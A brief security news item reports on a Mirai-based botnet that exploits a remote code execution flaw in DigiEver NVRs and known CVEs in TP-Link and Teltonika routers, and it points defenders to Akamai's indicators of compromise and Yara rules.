A new Mirai-based botnet is actively targeting vulnerabilities in DigiEver DS-2105 Pro NVRs and outdated TP-Link routers, exploiting a previously untracked remote code execution flaw in the NVRs. Active since at least September, the campaign uses vulnerabilities including CVE-2023-1389 on TP-Link devices and CVE-2018-17532 on Teltonika RUT9XX routers.
The botnet exploits DigiEver NVRs through improper input validation in the /cgi-bin/cgi_main.cgi URI, allowing attackers to execute commands remotely. Once compromised, devices fetch malware from external servers and become part of the botnet, which conducts DDoS attacks or spreads further using exploit kits and stolen credentials.
Notably, this Mirai variant employs advanced XOR and ChaCha20 encryption and targets various architectures, including x86, ARM, and MIPS. Akamai researchers highlight this as an evolution of Mirai tactics, surpassing older obfuscation methods.
Indicators of compromise (IoC) and Yara rules for detecting the malware are available in Akamai's detailed report, helping defenders mitigate this growing threat.
Read more...